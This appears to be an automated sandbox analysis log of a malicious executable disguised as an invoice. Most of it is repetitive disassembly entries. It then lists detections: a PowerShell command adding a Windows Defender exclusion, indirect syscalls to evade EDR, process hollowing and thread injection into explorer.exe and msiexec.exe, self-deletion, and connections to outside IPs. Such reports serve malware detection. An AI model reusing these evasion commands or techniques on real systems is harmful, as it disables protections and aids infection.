          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010929A0 mov eax, dword ptr fs:[00000030h]4_2_010929A0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010929A0 mov eax, dword ptr fs:[00000030h]4_2_010929A0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010929A0 mov eax, dword ptr fs:[00000030h]4_2_010929A0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0114A9D3 mov eax, dword ptr fs:[00000030h]4_2_0114A9D3
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_011169C0 mov eax, dword ptr fs:[00000030h]4_2_011169C0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0108A9D0 mov eax, dword ptr fs:[00000030h]4_2_0108A9D0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0108A9D0 mov eax, dword ptr fs:[00000030h]4_2_0108A9D0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0108A9D0 mov eax, dword ptr fs:[00000030h]4_2_0108A9D0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0108A9D0 mov eax, dword ptr fs:[00000030h]4_2_0108A9D0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0108A9D0 mov eax, dword ptr fs:[00000030h]4_2_0108A9D0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0108A9D0 mov eax, dword ptr fs:[00000030h]4_2_0108A9D0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010B49D0 mov eax, dword ptr fs:[00000030h]4_2_010B49D0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0110E9E0 mov eax, dword ptr fs:[00000030h]4_2_0110E9E0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010B29F9 mov eax, dword ptr fs:[00000030h]4_2_010B29F9
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010B29F9 mov eax, dword ptr fs:[00000030h]4_2_010B29F9
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0110C810 mov eax, dword ptr fs:[00000030h]4_2_0110C810
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0112483A mov eax, dword ptr fs:[00000030h]4_2_0112483A
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0112483A mov eax, dword ptr fs:[00000030h]4_2_0112483A
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010BA830 mov eax, dword ptr fs:[00000030h]4_2_010BA830
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010A2835 mov eax, dword ptr fs:[00000030h]4_2_010A2835
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010A2835 mov eax, dword ptr fs:[00000030h]4_2_010A2835
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010A2835 mov eax, dword ptr fs:[00000030h]4_2_010A2835
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010A2835 mov ecx, dword ptr fs:[00000030h]4_2_010A2835
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010A2835 mov eax, dword ptr fs:[00000030h]4_2_010A2835
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010A2835 mov eax, dword ptr fs:[00000030h]4_2_010A2835
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01092840 mov ecx, dword ptr fs:[00000030h]4_2_01092840
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01084859 mov eax, dword ptr fs:[00000030h]4_2_01084859
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01084859 mov eax, dword ptr fs:[00000030h]4_2_01084859
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010B0854 mov eax, dword ptr fs:[00000030h]4_2_010B0854
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01116870 mov eax, dword ptr fs:[00000030h]4_2_01116870
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01116870 mov eax, dword ptr fs:[00000030h]4_2_01116870
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0110E872 mov eax, dword ptr fs:[00000030h]4_2_0110E872
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0110E872 mov eax, dword ptr fs:[00000030h]4_2_0110E872
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0110C89D mov eax, dword ptr fs:[00000030h]4_2_0110C89D
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01080887 mov eax, dword ptr fs:[00000030h]4_2_01080887
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010AE8C0 mov eax, dword ptr fs:[00000030h]4_2_010AE8C0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_011508C0 mov eax, dword ptr fs:[00000030h]4_2_011508C0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0114A8E4 mov eax, dword ptr fs:[00000030h]4_2_0114A8E4
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010BC8F9 mov eax, dword ptr fs:[00000030h]4_2_010BC8F9
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010BC8F9 mov eax, dword ptr fs:[00000030h]4_2_010BC8F9
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010FEB1D mov eax, dword ptr fs:[00000030h]4_2_010FEB1D
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010FEB1D mov eax, dword ptr fs:[00000030h]4_2_010FEB1D
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010FEB1D mov eax, dword ptr fs:[00000030h]4_2_010FEB1D
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010FEB1D mov eax, dword ptr fs:[00000030h]4_2_010FEB1D
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010FEB1D mov eax, dword ptr fs:[00000030h]4_2_010FEB1D
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010FEB1D mov eax, dword ptr fs:[00000030h]4_2_010FEB1D
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010FEB1D mov eax, dword ptr fs:[00000030h]4_2_010FEB1D
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010FEB1D mov eax, dword ptr fs:[00000030h]4_2_010FEB1D
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010FEB1D mov eax, dword ptr fs:[00000030h]4_2_010FEB1D
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01154B00 mov eax, dword ptr fs:[00000030h]4_2_01154B00
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010AEB20 mov eax, dword ptr fs:[00000030h]4_2_010AEB20
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010AEB20 mov eax, dword ptr fs:[00000030h]4_2_010AEB20
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01148B28 mov eax, dword ptr fs:[00000030h]4_2_01148B28
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01148B28 mov eax, dword ptr fs:[00000030h]4_2_01148B28
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0112EB50 mov eax, dword ptr fs:[00000030h]4_2_0112EB50
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01152B57 mov eax, dword ptr fs:[00000030h]4_2_01152B57
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01152B57 mov eax, dword ptr fs:[00000030h]4_2_01152B57
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01152B57 mov eax, dword ptr fs:[00000030h]4_2_01152B57
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01152B57 mov eax, dword ptr fs:[00000030h]4_2_01152B57
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01128B42 mov eax, dword ptr fs:[00000030h]4_2_01128B42
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01116B40 mov eax, dword ptr fs:[00000030h]4_2_01116B40
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01116B40 mov eax, dword ptr fs:[00000030h]4_2_01116B40
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0114AB40 mov eax, dword ptr fs:[00000030h]4_2_0114AB40
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01078B50 mov eax, dword ptr fs:[00000030h]4_2_01078B50
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01134B4B mov eax, dword ptr fs:[00000030h]4_2_01134B4B
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01134B4B mov eax, dword ptr fs:[00000030h]4_2_01134B4B
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0107CB7E mov eax, dword ptr fs:[00000030h]4_2_0107CB7E
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01134BB0 mov eax, dword ptr fs:[00000030h]4_2_01134BB0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01134BB0 mov eax, dword ptr fs:[00000030h]4_2_01134BB0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01090BBE mov eax, dword ptr fs:[00000030h]4_2_01090BBE
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01090BBE mov eax, dword ptr fs:[00000030h]4_2_01090BBE
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010A0BCB mov eax, dword ptr fs:[00000030h]4_2_010A0BCB
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010A0BCB mov eax, dword ptr fs:[00000030h]4_2_010A0BCB
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010A0BCB mov eax, dword ptr fs:[00000030h]4_2_010A0BCB
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0112EBD0 mov eax, dword ptr fs:[00000030h]4_2_0112EBD0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01080BCD mov eax, dword ptr fs:[00000030h]4_2_01080BCD
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01080BCD mov eax, dword ptr fs:[00000030h]4_2_01080BCD
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01080BCD mov eax, dword ptr fs:[00000030h]4_2_01080BCD
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0110CBF0 mov eax, dword ptr fs:[00000030h]4_2_0110CBF0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010AEBFC mov eax, dword ptr fs:[00000030h]4_2_010AEBFC
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01088BF0 mov eax, dword ptr fs:[00000030h]4_2_01088BF0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01088BF0 mov eax, dword ptr fs:[00000030h]4_2_01088BF0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01088BF0 mov eax, dword ptr fs:[00000030h]4_2_01088BF0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0110CA11 mov eax, dword ptr fs:[00000030h]4_2_0110CA11
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010AEA2E mov eax, dword ptr fs:[00000030h]4_2_010AEA2E
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010BCA24 mov eax, dword ptr fs:[00000030h]4_2_010BCA24
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010BCA38 mov eax, dword ptr fs:[00000030h]4_2_010BCA38
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010A4A35 mov eax, dword ptr fs:[00000030h]4_2_010A4A35
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010A4A35 mov eax, dword ptr fs:[00000030h]4_2_010A4A35
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01090A5B mov eax, dword ptr fs:[00000030h]4_2_01090A5B
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01090A5B mov eax, dword ptr fs:[00000030h]4_2_01090A5B
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01086A50 mov eax, dword ptr fs:[00000030h]4_2_01086A50
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01086A50 mov eax, dword ptr fs:[00000030h]4_2_01086A50
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01086A50 mov eax, dword ptr fs:[00000030h]4_2_01086A50
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01086A50 mov eax, dword ptr fs:[00000030h]4_2_01086A50
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01086A50 mov eax, dword ptr fs:[00000030h]4_2_01086A50
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01086A50 mov eax, dword ptr fs:[00000030h]4_2_01086A50
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01086A50 mov eax, dword ptr fs:[00000030h]4_2_01086A50
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010BCA6F mov eax, dword ptr fs:[00000030h]4_2_010BCA6F
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010BCA6F mov eax, dword ptr fs:[00000030h]4_2_010BCA6F
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010BCA6F mov eax, dword ptr fs:[00000030h]4_2_010BCA6F
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0112EA60 mov eax, dword ptr fs:[00000030h]4_2_0112EA60
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010FCA72 mov eax, dword ptr fs:[00000030h]4_2_010FCA72
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010FCA72 mov eax, dword ptr fs:[00000030h]4_2_010FCA72
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0108EA80 mov eax, dword ptr fs:[00000030h]4_2_0108EA80
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0108EA80 mov eax, dword ptr fs:[00000030h]4_2_0108EA80
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0108EA80 mov eax, dword ptr fs:[00000030h]4_2_0108EA80
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0108EA80 mov eax, dword ptr fs:[00000030h]4_2_0108EA80
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0108EA80 mov eax, dword ptr fs:[00000030h]4_2_0108EA80
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0108EA80 mov eax, dword ptr fs:[00000030h]4_2_0108EA80
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0108EA80 mov eax, dword ptr fs:[00000030h]4_2_0108EA80
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0108EA80 mov eax, dword ptr fs:[00000030h]4_2_0108EA80
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0108EA80 mov eax, dword ptr fs:[00000030h]4_2_0108EA80
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01154A80 mov eax, dword ptr fs:[00000030h]4_2_01154A80
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010B8A90 mov edx, dword ptr fs:[00000030h]4_2_010B8A90
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01088AA0 mov eax, dword ptr fs:[00000030h]4_2_01088AA0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01088AA0 mov eax, dword ptr fs:[00000030h]4_2_01088AA0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010D6AA4 mov eax, dword ptr fs:[00000030h]4_2_010D6AA4
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010D6ACC mov eax, dword ptr fs:[00000030h]4_2_010D6ACC
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010D6ACC mov eax, dword ptr fs:[00000030h]4_2_010D6ACC
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010D6ACC mov eax, dword ptr fs:[00000030h]4_2_010D6ACC
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_00A29C10 SetUnhandledExceptionFilter,7_2_00A29C10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_00A295F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00A295F0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 103.224.182.210 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 44.227.76.166 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 156.67.74.121 80Jump to behavior
          Adds a directory exclusion to Windows Defender
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exe"
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exe"Jump to behavior
          Found direct / indirect Syscall (likely to bypass EDR)
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeNtQueueApcThread: Indirect: 0x100A4F2Jump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeNtClose: Indirect: 0x100A56C
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeNtQueueApcThread: Indirect: 0xFCA4F2Jump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeNtClose: Indirect: 0xFCA56C
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeMemory written: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exe base: 400000 value starts with: 4D5AJump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeThread register set: target process: 4004Jump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeThread register set: target process: 4004Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread register set: target process: 4004Jump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: A20000Jump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exe"Jump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess created: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exe "C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_00A231A9 FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,GetLengthSid,memset,GlobalAlloc,InitializeAcl,AddAccessAllowedAce,GetAce,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetSecurityDescriptorLength,MakeSelfRelativeSD,GetLastError,GlobalFree,GetLastError,FreeSid,7_2_00A231A9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_00A230F2 AllocateAndInitializeSid,GetLastError,GetLengthSid,FreeSid,GetLengthSid,memcpy,FreeSid,7_2_00A230F2
          Source: explorer.exe, 00000006.00000000.2139811469.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4571652628.00000000013A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
          Source: explorer.exe, 00000006.00000000.2142601494.00000000048E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2139811469.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4571652628.00000000013A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.2139811469.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4571652628.00000000013A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000002.4571105998.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2138849536.0000000000D69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +Progman
          Source: explorer.exe, 00000006.00000000.2139811469.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4571652628.00000000013A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000006.00000002.4576902111.00000000098AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2150317707.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd31A
